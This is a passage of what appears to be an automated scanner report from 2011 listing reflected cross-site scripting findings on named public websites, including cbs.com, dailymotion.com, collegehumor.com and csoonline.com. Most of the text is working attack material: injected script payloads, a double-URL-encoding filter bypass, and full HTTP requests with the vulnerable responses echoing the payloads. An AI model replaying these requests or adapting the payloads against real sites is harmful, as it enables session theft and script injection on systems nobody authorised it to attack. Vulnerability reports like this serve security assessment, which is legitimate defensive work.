Cookie: ASPSESSIONIDSQQABTDA=AEMEPKABKNLGLDHJGGFBJOHM; __utmz=252525594.1298901533.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/13; __utma=252525594.1551423665.1298901533.1298901533.1298901533.1; __utmc=252525594; __utmb=252525594.3.10.1298901533

Response

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 14:00:38 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PleskWin
MicrosoftOfficeWebServer: 5.0_Pub
Content-Length: 26404
Content-Type: text/html
Cache-control: private

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>ATTORNEYS - DALLAS</title>
<meta name="description" content="
...[SNIP]...
<a href="http://www.bizfind.us/ricerca.asp?idregione=44&ateco=811103&pg=1&idcatul=attorneys&idcomune1=dallas&92880"><script>alert(1)</script>93b4e678caa=1" rel="nofollow">
...[SNIP]...

3.28. http://www.bizfind.us/cat/44/1/37711/dallas.aspx [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.bizfind.us
Path:	/cat/44/1/37711/dallas.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c4dd5"><script>alert(1)</script>f358a02dbe3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cat/44/1/37711/dallas.aspx?c4dd5"><script>alert(1)</script>f358a02dbe3=1 HTTP/1.1
Host: www.bizfind.us
Proxy-Connection: keep-alive
Referer: http://www.bizfind.us/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDSQQABTDA=AEMEPKABKNLGLDHJGGFBJOHM; __utmz=252525594.1298901533.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/13; __utma=252525594.1551423665.1298901533.1298901533.1298901533.1; __utmc=252525594; __utmb=252525594.2.10.1298901533

Response

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 14:00:38 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PleskWin
MicrosoftOfficeWebServer: 5.0_Pub
Content-Length: 54980
Content-Type: text/html
Cache-control: private

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>DALLAS popular categories</title>
<meta name="description" co
...[SNIP]...
<a href="http://www.bizfind.us/categorie.asp?idregione=44&pg=1&istat=37711&idcomune1=dallas&c4dd5"><script>alert(1)</script>f358a02dbe3=1" rel="nofollow">
...[SNIP]...

3.29. http://www.bloggingstocks.com/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.bloggingstocks.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6b19c"><script>alert(1)</script>024d21d7b1a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?6b19c"><script>alert(1)</script>024d21d7b1a=1 HTTP/1.1
Host: www.bloggingstocks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 13:34:28 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Keep-Alive: timeout=5, max=999999
Connection: Keep-Alive
Content-Type: text/html
X-Pad: avoid browser bug
Content-Length: 103304

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>WWW - BloggingStocks
...[SNIP]...
<link rel="canonical" href="http://www.bloggingstocks.com/?6b19c"><script>alert(1)</script>024d21d7b1a=1"/>
...[SNIP]...

3.30. http://www.bloggingstocks.com/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.bloggingstocks.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 94527"-alert(1)-"1130af21a60 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?94527"-alert(1)-"1130af21a60=1 HTTP/1.1
Host: www.bloggingstocks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 13:34:30 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Keep-Alive: timeout=5, max=999996
Connection: Keep-Alive
Content-Type: text/html
X-Pad: avoid browser bug
Content-Length: 103202

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>WWW - BloggingStocks
...[SNIP]...
s.pf";
s_265.pageType="";
s_265.linkInternalFilters="javascript:,bloggingstocks.com";
s_265.mmxgo = true;
s_265.prop1="BloggingStocks";
s_265.prop2="Home";
s_265.prop12="http://www.bloggingstocks.com/?94527"-alert(1)-"1130af21a60=1";
s_265.prop16="BloggingStocks";
s_265.prop18="";
s_265.prop19="";
s_265.prop20="";

var s_code=s_265.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

3.31. http://www.cbs.com/primetime/big_bang_theory/video/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.cbs.com
Path:	/primetime/big_bang_theory/video/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f8b2e"-alert(1)-"c286caefd26 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /primetime/big_bang_theory/video/?f8b2e"-alert(1)-"c286caefd26=1 HTTP/1.1
Host: www.cbs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/5.2.14
X-Real-Server: ws3175.drt.cbsig.net
Content-Type: text/html; charset=ISO-8859-1
Expires: Mon, 28 Feb 2011 13:34:39 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 28 Feb 2011 13:34:39 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: carousel_state=0%2Ctwoby%2C1%7C1%2Ctwoby%2C1%7C2%2Ctwoby%2C1; expires=Mon, 28-Feb-2011 14:34:40 GMT
Set-Cookie: video_section=Default; expires=Mon, 28-Feb-2011 14:34:40 GMT
Content-Length: 85574

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

   
   <m
...[SNIP]...
/705/159/CBS_BIGBANG_417_IMAGE_CIAN_140x80.jpg",
       title: "The Big Bang Theory - The Toast Derivation",
       message: 'Cool message here',
       backLink: "http://www.cbs.com/primetime/big_bang_theory/video/?f8b2e"-alert(1)-"c286caefd26=1", //when clicked on title
       description: "Sheldon struggles to cope when he realizes it\'s actually Leonard who is the center of their social group.",
       status: '',
       actionLinkText: "More videos",

...[SNIP]...

3.32. http://www.chamonix.com/press,104,en.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.chamonix.com
Path:	/press,104,en.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 19939"><script>alert(1)</script>417c8bc064a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /press,104,en.html?19939"><script>alert(1)</script>417c8bc064a=1 HTTP/1.1
Host: www.chamonix.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 13:34:54 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 48422

...<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org
...[SNIP]...
<form name="formulaireconnection" action="/press,104,en.html?19939"><script>alert(1)</script>417c8bc064a=1" method="post" onSubmit="return testformconnection();" style="margin:0px;padding:0px">
...[SNIP]...

3.33. http://www.cheatscodesguides.com/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.cheatscodesguides.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4a081"-alert(1)-"be8f1205899 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?4a081"-alert(1)-"be8f1205899=1 HTTP/1.1
Host: www.cheatscodesguides.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html;charset=UTF-8
Expires: Mon, 28 Feb 2011 13:34:41 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 28 Feb 2011 13:34:41 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: decc=US;Path=/;Domain=.cheatscodesguides.com
Set-Cookie: i18n-cc=US;Path=/;Domain=.cheatscodesguides.com
Set-Cookie: NGUserID=a016c07-25282-1191953866-2;Path=/;Domain=.cheatscodesguides.com;Expires=Tue, 27-Aug-30 13:34:41 GMT
Set-Cookie: i18n-cc=US;Path=/;Domain=.cheatscodesguides.com
Set-Cookie: freq=c-1298900081420v-1n-23mc+1298900081420mv+1mn+23wwe~0;Path=/;Domain=.cheatscodesguides.com
Content-Length: 59559

<html><head>
<link rel="stylesheet" href="http://media.cheatscodesguides.com/ccg/css/ccg.css" type="text/css">
<title>Cheats, Codes and Guides</title>
<meta name="description" content="HUGE colle
...[SNIP]...
if(typeof _comscoreGuard == 'undefined') {
       COMSCORE.beacon({
        c1:2,
        c2:"3000068",
        c3:"",
        c4:"http://www.cheatscodesguides.com/?4a081"-alert(1)-"be8f1205899=1",
        c5:"",
        c6:"",
        c15:"" });
       var _comscoreGuard = new Object();
   }
</script>
...[SNIP]...

3.34. http://www.cheatscodesguides.com/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.cheatscodesguides.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 82cec"><script>alert(1)</script>c75a97fd7b0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?82cec"><script>alert(1)</script>c75a97fd7b0=1 HTTP/1.1
Host: www.cheatscodesguides.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html;charset=UTF-8
Expires: Mon, 28 Feb 2011 13:34:40 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 28 Feb 2011 13:34:40 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: decc=US;Path=/;Domain=.cheatscodesguides.com
Set-Cookie: i18n-cc=US;Path=/;Domain=.cheatscodesguides.com
Set-Cookie: NGUserID=a016c04-15264-1265047864-1;Path=/;Domain=.cheatscodesguides.com;Expires=Tue, 27-Aug-30 13:34:40 GMT
Set-Cookie: i18n-cc=US;Path=/;Domain=.cheatscodesguides.com
Set-Cookie: freq=c-1298900080432v-1n-23mc+1298900080432mv+1mn+23wwe~0;Path=/;Domain=.cheatscodesguides.com
Content-Length: 59711

<html><head>
<link rel="stylesheet" href="http://media.cheatscodesguides.com/ccg/css/ccg.css" type="text/css">
<title>Cheats, Codes and Guides</title>
<meta name="description" content="HUGE colle
...[SNIP]...
<img src="http://b.scorecardresearch.com/b?c1=2&c2=3000068&c3=&c4=http://www.cheatscodesguides.com/?82cec"><script>alert(1)</script>c75a97fd7b0=1&c5=&c6=&c15=C67BD3C1&cv=1.3&cj=1" style="display:none" width="0" height="0" alt="" />
...[SNIP]...

3.35. http://www.chmedia.com/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.chmedia.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ca889"-alert(1)-"00638fcc054 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?ca889"-alert(1)-"00638fcc054=1 HTTP/1.1
Host: www.chmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 13:35:05 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.3.3
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: jument_hash=deleted; expires=Sun, 28-Feb-2010 13:35:04 GMT; path=/; domain=chmedia.com
Set-Cookie: jument_hash=f3770dd1f6e47cbbbde90174c3568b22fe7250b0; expires=Sun, 28-Feb-2016 18:38:55 GMT; path=/; domain=chmedia.com
Set-Cookie: jument_hash=f3770dd1f6e47cbbbde90174c3568b22fe7250b0; expires=Sun, 28-Feb-2016 18:38:55 GMT; path=/; domain=chmedia.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 11772

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <title>CH Med
...[SNIP]...
e":"none","rating":"unrated","ctype":"other"};
       jument.ad_site = "";
       jument.cookie.domain = "chmedia.com";
       jument.home_url = "http://www.chmedia.com";
       jument.this_url = "http://www.chmedia.com/?ca889"-alert(1)-"00638fcc054=1";
       jument.user_id = 0;
           </script>
...[SNIP]...

3.36. http://www.cofrac.fr/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.cofrac.fr
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 23ed8"-alert(1)-"3a0b70bc101 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?23ed8"-alert(1)-"3a0b70bc101=1 HTTP/1.1
Host: www.cofrac.fr
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: PHP/5.3.2
X-Powered-By: ASP.NET
Date: Mon, 28 Feb 2011 13:34:16 GMT
Connection: close
Content-Length: 20081

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>

<head>
<base href="http://www.cofrac.fr/site/content/french/pages/home/">
<
...[SNIP]...
<script language="javascript">
   var file_exists=true;
   var directory="home";
   var path="index.php";
   var extra_parameters="?23ed8"-alert(1)-"3a0b70bc101=1";

</script>
...[SNIP]...

3.37. http://www.collegehumor.com/cutecollegegirl [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.collegehumor.com
Path:	/cutecollegegirl

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f2427'-alert(1)-'98361b723e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cutecollegegirlf2427'-alert(1)-'98361b723e HTTP/1.1
Host: www.collegehumor.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Mon, 28 Feb 2011 13:34:44 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: ch_hash=deleted; expires=Sun, 28-Feb-2010 13:34:43 GMT; path=/; domain=.collegehumor.com
Set-Cookie: ch_hash=7541ddc3340e0dd511fa4a2051adaf8a4379c742; expires=Sat, 27-Feb-2016 13:34:44 GMT; path=/; domain=.collegehumor.com
Set-Cookie: ch_hash=7541ddc3340e0dd511fa4a2051adaf8a4379c742; expires=Sat, 27 Feb 2016 13:34:44 GMT; path=/; domain=.collegehumor.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Set-Cookie: returning_user=deleted; expires=Sun, 28-Feb-2010 13:34:43 GMT; path=/; domain=.collegehumor.com
Set-Cookie: returning_user=1; expires=Wed, 30-Mar-2011 13:34:44 GMT; path=/; domain=.collegehumor.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 48629

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:fb="h
...[SNIP]...
var jument = window.jument || {};
jument.cookie.domain = '.collegehumor.com';

var ch = window.ch || {};
ch.logged_in = false;
ch.this_url = 'http://www.collegehumor.com/cutecollegegirlf2427'-alert(1)-'98361b723e';
ch.this_url_64 = 'aHR0cDovL3d3dy5jb2xsZWdlaHVtb3IuY29tL2N1dGVjb2xsZWdlZ2lybGYyNDI3Jy1hbGVydCgxKS0nOTgzNjFiNzIzZQ==';
ch.home_url = 'http://www.collegehumor.com/';
ch.user_id = false;

...[SNIP]...

3.38. http://www.collegehumor.com/cutecollegegirl [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.collegehumor.com
Path:	/cutecollegegirl

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ec092'-alert(1)-'387554248b0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cutecollegegirl?ec092'-alert(1)-'387554248b0=1 HTTP/1.1
Host: www.collegehumor.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 13:34:41 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: ch_hash=deleted; expires=Sun, 28-Feb-2010 13:34:40 GMT; path=/; domain=.collegehumor.com
Set-Cookie: ch_hash=18feb99eb9d4244c0c57520f61d37a7bf7fcc7b2; expires=Sat, 27-Feb-2016 13:34:41 GMT; path=/; domain=.collegehumor.com
Set-Cookie: ch_hash=18feb99eb9d4244c0c57520f61d37a7bf7fcc7b2; expires=Sat, 27 Feb 2016 13:34:41 GMT; path=/; domain=.collegehumor.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Set-Cookie: returning_user=deleted; expires=Sun, 28-Feb-2010 13:34:40 GMT; path=/; domain=.collegehumor.com
Set-Cookie: returning_user=1; expires=Wed, 30-Mar-2011 13:34:41 GMT; path=/; domain=.collegehumor.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 35780

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:fb="h
...[SNIP]...
ar jument = window.jument || {};
jument.cookie.domain = '.collegehumor.com';

var ch = window.ch || {};
ch.logged_in = false;
ch.this_url = 'http://www.collegehumor.com/cutecollegegirl?ec092'-alert(1)-'387554248b0=1';
ch.this_url_64 = 'aHR0cDovL3d3dy5jb2xsZWdlaHVtb3IuY29tL2N1dGVjb2xsZWdlZ2lybD9lYzA5MictYWxlcnQoMSktJzM4NzU1NDI0OGIwPTE=';
ch.home_url = 'http://www.collegehumor.com/';
ch.user_id = fals
...[SNIP]...

3.39. http://www.csoonline.com/module.htm [leadTaxonomy parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.csoonline.com
Path:	/module.htm

Issue detail

The value of the leadTaxonomy request parameter is copied into the HTML document as plain text between tags. The payload ccca8%253cimg%2520src%253da%2520onerror%253dalert%25281%2529%253ec68746d9450 was submitted in the leadTaxonomy parameter. This input was echoed as ccca8<img src=a onerror=alert(1)>c68746d9450 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Request

GET /module.htm?moduleType=article_comments&contentId=486324&taxonomyId=41193&leadTaxonomy=securityccca8%253cimg%2520src%253da%2520onerror%253dalert%25281%2529%253ec68746d9450&ajax=true&outputFormat=json HTTP/1.1
Host: www.csoonline.com
Proxy-Connection: keep-alive
Referer: http://www.csoonline.com/article/486324/security-tools-templates-policies
X-Prototype-Version: 1.5.1
X-Requested-With: XMLHttpRequest
Accept: text/javascript, text/html, application/xml, text/xml, */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=209317120.1298897096.1.1.utmcsr=ncircle.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_pers=%20s_pv%3DArticle%253A486324%253ASecurity%2520Tools%252C%2520Templates%252C%2520Policies%7C1298898971263%3B; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_ppv%3D0%3B%20s_sq%3D%3B; __utma=209317120.1042616613.1298897096.1298897096.1298897096.1; __utmc=209317120; __utmb=209317120.2.10.1298897096; MetrixLabp10833_master=1; __switchTo5x=4; __unam=db592fa-12e6c4e2ed5-37f53805-1; NSC_djp.dpn=44593ca03660

Response

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 12:46:28 GMT
Server: Apache/1.3.37 (Unix) Resin/3.0.22
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Set-Cookie: NSC_djp.dpn=44593ca03660;expires=Mon, 28-Feb-11 13:02:10 GMT;path=/
Cache-Control: private
Content-Length: 1771

{"comments":"<link href=\"http:\/\/comments.csoonline.com\/themes\/CIO.com\/style.css\" rel=\"stylesheet\" type=\"text\/css\" media=\"screen\" \/><a id=\"comment\"><\/a>\n<a id=\"comment-10368\"><\/
...[SNIP]...
<a href=\"http:\/\/comments.csoonline.com\/node\/486324&topic=securityccca8<img src=a onerror=alert(1)>c68746d9450\">
...[SNIP]...

3.40. http://www.dailyfinance.com/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.dailyfinance.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6b822"-alert(1)-"057c5998ce7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?6b822"-alert(1)-"057c5998ce7=1 HTTP/1.1
Host: www.dailyfinance.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 13:36:10 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=utf-8
Set-Cookie: JSESSIONID=3D979C10B4F0B191A55BEE8C0EE25E67; Path=/
Keep-Alive: timeout=5, max=58
Connection: Keep-Alive
Content-Length: 141731

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/"
xmlns:fb="http:/
...[SNIP]...
s_265.linkInternalFilters="javascript:,dailyfinance.com";

s_265.trackExternalLinks=true;

s_265.mmxgo=true;

s_265.prop1="Main";
s_265.prop2="Main";
s_265.prop12="http://www.dailyfinance.com/?6b822"-alert(1)-"057c5998ce7=1";
s_265.prop21="";

var s_code=s_265.t();
}
var s_account="aoldailyfin,aolsvc";
(function(){
var d = document, s = d.createElement('script');
s.type = 'text/javascript';
s.src =
...[SNIP]...

3.41. http://www.dailymotion.com/us [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.dailymotion.com
Path:	/us

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3bc84"-alert(1)-"af6a088c7fa was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /us?3bc84"-alert(1)-"af6a088c7fa=1 HTTP/1.1
Host: www.dailymotion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Server: DMS/1.0.42
Content-Type: text/html; charset=utf-8
P3p: policyref="http://www.dailymotion.com/w3c/p3p.xml", CP="IDC DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Date: Mon, 28 Feb 2011 13:36:18 GMT
X-DM-Cache: DONT
Connection: close
Set-Cookie: tg=224970; expires=Sun, 28-Feb-2021 13:36:18 GMT; path=/
Set-Cookie: dmvk=4d6ba4d29d5ad; path=/; domain=.dailymotion.com
Set-Cookie: ql_n=0; expires=Tue, 28-Feb-2012 13:36:18 GMT; path=/
Set-Cookie: masscast=b%3A0%3B; path=/
X-Dm-Page: us.html.home

<!DOCTYPE html>
<html xml:lang="en" xmlns:fb="http://www.facebook.com/2008/fbml">
<head id="head">
<title>Dailymotion - Online Videos, Music, and Movies. Watch a Video Today!</title>
<meta http-equiv=
...[SNIP]...
("dailimotion");
ga._addIgnoredOrganic("dalimotion");
ga._addIgnoredOrganic("dailymation");
ga._setCustomVar(3, "page_type", "home", 3);
ga._setCustomVar(4, "segment", "23", 1);
ga._trackPageview("/us?3bc84"-alert(1)-"af6a088c7fa=1&site_version=us");
var timeTracker = new TimeTracker();
timeTracker._recordStartTime();
setTimeout('timeTracker._recordEndTime(); timeTracker._track(ga, "Time spent", "5 mn");', 300000);
} catch(err
...[SNIP]...

3.42. http://www.davidcorn.com/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.davidcorn.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4efc8"><script>alert(1)</script>88769f13774 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?4efc8"><script>alert(1)</script>88769f13774=1 HTTP/1.1
Host: www.davidcorn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Mon, 28 Feb 2011 13:20:50 GMT
Content-type: text/html
Connection: close

